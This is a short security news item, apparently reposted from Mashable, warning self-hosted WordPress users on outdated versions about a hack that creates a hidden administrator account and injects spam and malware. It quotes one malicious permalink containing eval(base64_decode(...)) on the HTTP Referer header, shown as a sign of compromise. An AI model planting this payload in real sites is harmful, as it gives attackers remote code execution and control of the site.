WordPress 2.8.4 is a current stable and secure version. If you are running an outdated version of WordPress, which is self-hosted, then your blog is vulnerable to a new attack.

The WordPress users who have hosted their blog in WordPress.com aren’t affected.

This new hack will create a strange permalink and a hidden Administrator Account, which will in return set access to the database.

The permalinks of hacked account will have extra lines, similar to below shown link.

example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

This is nothing but an evaluated code that will get executed to create a hidden Administrator account.

Then using a JavaScript hides itself in the user’s page and inserts Spam and Malware into the articles. This will in return result in removal of your site from Google Search results.

WordPress has advised users to upgrade to the latest WordPress 2.8.4 version As Soon As Possible (ASAP), to avoid any problems.

Source : Mashable